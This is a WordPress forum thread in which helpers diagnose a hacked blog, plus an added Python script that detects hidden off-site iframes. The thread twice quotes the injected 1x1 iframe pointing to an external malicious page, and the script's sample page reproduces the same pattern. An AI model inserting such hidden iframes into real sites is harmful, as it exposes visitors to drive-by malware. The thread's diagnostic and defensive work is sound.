• Hi!

    Google.de has indicated that my site (cjd-update.info) would be dangerous for visitors. Unfortunately it is quite right. A friend found out that “something” tries to activate Java applications on his IE and Vista. I myself use Apple and get no warnings. I guess the evil comes from a plugin. But how can I find out from which one? For the time being the site is put in maintenance mode. Any help would be great.

    Thank you

Viewing 15 replies - 1 through 15 (of 15 total)
  • you look at the files ..

    your site isn't even cached in google, so i can't even look at the cached site, and you just said it's in maintenance mode.

    what else can you do?

    http://web.archive.org/web/20070517185830/http://www.onlzoberurff.info/

    you have a script running that's picking up ips and operating systems. depending on what sort of javascript is being used, that may very well be what’s causing it.

    nobody really needs to know that anyway, do they? I already know what my ip and os is — i don't need you to tell me.

    Thread Starter Wukung

    (@wukung)

    sorry, NOW the site is available: http://cjd-update.info

    Here the entry at google.de:

    http://www.google.de/search?q=cjd-update&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:de:official&client=firefox-a

    I am looking for an idea of how to find the evil source…

    I saw the entry on google.com, thanks. In English. Had I not, I wouldn't have been able to tell you that google isn't caching your site.

    SOMETHING on your site is contacting or attempting to contact localhost — which for your readers is THEIR box. I brought up your site from a shell using lynx and saw it quite clearly.

    near the bottom:

    <iframe src="http://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>

    there's your problem. actually, that's not the problem, but it's your symptom.

    your site has been compromised. check your permissions:

    directories: 755
    files: 644

    leaving wp-content and the theme directories open for editing is a security risk.

    Thread Starter Wukung

    (@wukung)

    Now I have changed the only file I know of where “Localhost” matters. I deleted define('ENABLE_CACHE', true); from the wp-config.php. Do you have an idea what that SOMETHING could be?

    Thank you!!

    my last reply was caught by the forum as spam –

    near the bottom:

    <iframe src="http://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>

    there's your problem. actually, that's not the problem, but it's your symptom.

    your site has been compromised. check your permissions:

    directories: 755
    files: 644

    leaving wp-content and the theme directories open for editing is a security risk.

    Thread Starter Wukung

    (@wukung)

    It seems the plugin SHARE THIS was the foul source. Could you please be so kind and check with your shell? THANKS

    see Whooami’s last 2 replies (they were caught in moderation, I just released them)

    i looked – it might have been inside that plugin .. dunno. I really doubt that Alex King is letting people download plugins with exploits in the code. Isn't that his plugin?

    I just downloaded the Share This plugin from Alex’s site and don’t see any iframe in there.

    yeah i looked too, didn't see it .. in this guy's page source, the iframe was immediately before the closing body tag and after the last <!-- Share This END -->

    Thread Starter Wukung

    (@wukung)

    I checked the permissions. But they are ok (755). Nevertheless, thank you for the idea. It seems to be settled…

    You have a mystery iframe just below:
    “Der Weg nach Oberurff”
    and above “Links”.
    Something in that map thing. I used wget to grab the source and there it is. Using lynx I too saw that reference to localhost.
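
The manual check in the replies above (grab the page source, look for a 1x1 iframe pointing off-site) can be scripted. This is an added example, not part of the original thread; the function names, the `blog.example` host and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that hide an element from the visitor.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _tiny(value):
    """True for width/height values such as "0", "1" or "1px"."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1

class IframeAudit(HTMLParser):
    """Collects (line, src) for iframes that are both off-site and invisible."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        external = bool(host) and host != self.site_host
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or bool(HIDDEN_STYLE.search(a.get("style", ""))))
        if external and hidden:
            line, _ = self.getpos()
            self.findings.append((line, a["src"]))

def find_hidden_iframes(html, site_host):
    audit = IframeAudit(site_host)
    audit.feed(html)
    return audit.findings

# Constructed sample: a visible map embed plus an injected 1x1 iframe
# placed just before the closing body tag, as described in the thread.
SAMPLE = """<html><body>
<iframe src="http://maps.example.net/embed?q=route" width="425" height="350"></iframe>
<!-- Share This END -->
<iframe src="http://injected.example/se.php?id=0" width=1 height=1></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, src in find_hidden_iframes(SAMPLE, "blog.example"):
        print(f"line {line}: hidden external iframe -> {src}")
```

Run it against the HTML the server actually sends (for example a file saved with wget), since injected markup often does not appear in the theme or plugin files themselves.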

    Thread Starter Wukung

    (@wukung)

    Thank you very much. I will delete that link at once. Besides your hint I was already thinking that could be the troublemaker. THANKS!

  • The topic ‘Virus within wp’ is closed to new replies.